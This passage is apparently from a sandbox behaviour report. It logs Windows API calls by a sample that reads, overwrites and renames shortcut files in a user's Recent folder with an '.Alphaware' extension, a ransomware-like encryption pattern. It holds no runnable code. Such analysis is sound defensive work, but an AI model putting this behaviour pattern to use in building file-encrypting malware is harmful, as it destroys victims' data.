"c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\duc5tpm3pdmaxr1.ots.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0ba20c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0ba20c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b9a4920, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1388)) returned 1 [0096.309] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Duc5tpM3PDmAXr1.ots.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\duc5tpm3pdmaxr1.ots.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Duc5tpM3PDmAXr1.ots.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\duc5tpm3pdmaxr1.ots.lnk.alphaware")) returned 1 [0096.311] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DZ5O.lnk", dwFileAttributes=0x80) returned 1 [0096.311] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DZ5O.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\dz5o.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2493a58 | out: lpFileInformation=0x2493a58*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd167e520, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd167e520, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd167e520, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x97c)) returned 1 [0096.311] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DZ5O.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\dz5o.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.311] ReadFile (in: hFile=0x250, lpBuffer=0x2494688, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2494688*, lpNumberOfBytesRead=0x23e958*=0x97c, lpOverlapped=0x0) returned 1 [0096.332] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DZ5O.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\dz5o.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.335] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DZ5O.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\dz5o.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd167e520, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd167e520, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b9f0be0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xd74)) returned 1 [0096.335] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DZ5O.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\dz5o.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DZ5O.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\dz5o.lnk.alphaware")) returned 1 [0096.336] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\D_cm4s7fP.lnk", dwFileAttributes=0x80) returned 1 [0096.336] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\D_cm4s7fP.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\d_cm4s7fp.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2519598 | out: lpFileInformation=0x2519598*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcf8970c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf8970c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcf8970c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9b3)) returned 1 [0096.336] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\D_cm4s7fP.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\d_cm4s7fp.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.337] ReadFile (in: hFile=0x250, lpBuffer=0x251a220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x251a220*, lpNumberOfBytesRead=0x23e958*=0x9b3, lpOverlapped=0x0) returned 1 [0096.357] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\D_cm4s7fP.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\d_cm4s7fp.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.359] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\D_cm4s7fP.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\d_cm4s7fp.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf8970c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf8970c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ba16d40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xdc8)) returned 1 [0096.360] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\D_cm4s7fP.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\d_cm4s7fp.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\D_cm4s7fP.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\d_cm4s7fp.lnk.alphaware")) returned 1 [0096.361] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\E1l_XrQ6aMcGTT.lnk", dwFileAttributes=0x80) returned 1 [0096.361] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\E1l_XrQ6aMcGTT.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\e1l_xrq6amcgtt.lnk"), fInfoLevelId=0x0, lpFileInformation=0x259f3f8 | out: lpFileInformation=0x259f3f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0c3a640, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0c3a640, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0c3a640, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x130b)) returned 1 [0096.361] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\E1l_XrQ6aMcGTT.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\e1l_xrq6amcgtt.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.361] ReadFile (in: hFile=0x250, lpBuffer=0x259f6d0, nNumberOfBytesToRead=0x130b, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x259f6d0*, lpNumberOfBytesRead=0x23e958*=0x130b, lpOverlapped=0x0) returned 1 [0096.392] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\E1l_XrQ6aMcGTT.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\e1l_xrq6amcgtt.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.395] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\E1l_XrQ6aMcGTT.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\e1l_xrq6amcgtt.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0c3a640, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0c3a640, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ba63000, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1a34)) returned 1 [0096.395] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\E1l_XrQ6aMcGTT.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\e1l_xrq6amcgtt.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\E1l_XrQ6aMcGTT.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\e1l_xrq6amcgtt.lnk.alphaware")) returned 1 [0096.397] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\e4W8iO-jmf.lnk", dwFileAttributes=0x80) returned 1 [0096.397] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\e4W8iO-jmf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\e4w8io-jmf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x242b588 | out: lpFileInformation=0x242b588*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce5b2220, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd12ec420, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd12ec420, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xd6b)) returned 1 [0096.397] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\e4W8iO-jmf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\e4w8io-jmf.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.397] ReadFile (in: hFile=0x250, lpBuffer=0x242c5c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x242c5c8*, lpNumberOfBytesRead=0x23e958*=0xd6b, lpOverlapped=0x0) returned 1 [0096.418] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\e4W8iO-jmf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\e4w8io-jmf.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.421] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\e4W8iO-jmf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\e4w8io-jmf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce5b2220, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd12ec420, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8baaf2c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x12b4)) returned 1 [0096.421] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\e4W8iO-jmf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\e4w8io-jmf.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\e4W8iO-jmf.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\e4w8io-jmf.lnk.alphaware")) returned 1 [0096.422] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\EGL9Rx1KXSqWh.mkv.lnk", dwFileAttributes=0x80) returned 1 [0096.423] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\EGL9Rx1KXSqWh.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\egl9rx1kxsqwh.mkv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24b44b0 | out: lpFileInformation=0x24b44b0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd009fb00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd009fb00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd009fb00, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3ca)) returned 1 [0096.423] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\EGL9Rx1KXSqWh.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\egl9rx1kxsqwh.mkv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.423] ReadFile (in: hFile=0x250, lpBuffer=0x24b4b90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24b4b90*, lpNumberOfBytesRead=0x23e958*=0x3ca, lpOverlapped=0x0) returned 1 [0096.445] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\EGL9Rx1KXSqWh.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\egl9rx1kxsqwh.mkv.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.448] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\EGL9Rx1KXSqWh.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\egl9rx1kxsqwh.mkv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd009fb00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd009fb00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bafb580, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5e0)) returned 1 [0096.448] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\EGL9Rx1KXSqWh.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\egl9rx1kxsqwh.mkv.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\EGL9Rx1KXSqWh.mkv.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\egl9rx1kxsqwh.mkv.lnk.alphaware")) returned 1 [0096.449] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\eUSZ.lnk", dwFileAttributes=0x80) returned 1 [0096.449] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\eUSZ.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\eusz.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2536020 | out: lpFileInformation=0x2536020*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xced48840, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd116f660, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd116f660, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x11e1)) returned 1 [0096.450] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\eUSZ.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\eusz.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.450] ReadFile (in: hFile=0x250, lpBuffer=0x25362a0, nNumberOfBytesToRead=0x11e1, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25362a0*, lpNumberOfBytesRead=0x23e958*=0x11e1, lpOverlapped=0x0) returned 1 [0096.481] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\eUSZ.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\eusz.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.483] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\eUSZ.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\eusz.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xced48840, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd116f660, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bb47840, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x18b4)) returned 1 [0096.483] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\eUSZ.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\eusz.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\eUSZ.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\eusz.lnk.alphaware")) returned 1 [0096.485] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gerLGhJ-J1Fq.lnk", dwFileAttributes=0x80) returned 1 [0096.485] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gerLGhJ-J1Fq.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\gerlghj-j1fq.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25c0b08 | out: lpFileInformation=0x25c0b08*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd14db600, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd14db600, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd14db600, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9d4)) returned 1 [0096.485] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gerLGhJ-J1Fq.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\gerlghj-j1fq.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.485] ReadFile (in: hFile=0x250, lpBuffer=0x25c17d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25c17d0*, lpNumberOfBytesRead=0x23e958*=0x9d4, lpOverlapped=0x0) returned 1 [0096.510] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gerLGhJ-J1Fq.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\gerlghj-j1fq.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.512] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gerLGhJ-J1Fq.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\gerlghj-j1fq.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd14db600, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd14db600, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bb93b00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xdf4)) returned 1 [0096.513] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gerLGhJ-J1Fq.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\gerlghj-j1fq.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gerLGhJ-J1Fq.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\gerlghj-j1fq.lnk.alphaware")) returned 1 [0096.514] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\grD5c_7rsX_r-Az.lnk", dwFileAttributes=0x80) returned 1 [0096.514] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\grD5c_7rsX_r-Az.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\grd5c_7rsx_r-az.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24461d8 | out: lpFileInformation=0x24461d8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0053840, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0053840, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0053840, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x2fd)) returned 1 [0096.514] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\grD5c_7rsX_r-Az.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\grd5c_7rsx_r-az.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.515] ReadFile (in: hFile=0x250, lpBuffer=0x24467c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24467c8*, lpNumberOfBytesRead=0x23e958*=0x2fd, lpOverlapped=0x0) returned 1 [0096.537] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\grD5c_7rsX_r-Az.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\grd5c_7rsx_r-az.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.539] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\grD5c_7rsX_r-Az.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\grd5c_7rsx_r-az.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0053840, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0053840, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bbdfdc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x4c8)) returned 1 [0096.540] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\grD5c_7rsX_r-Az.lnk" (normalized: 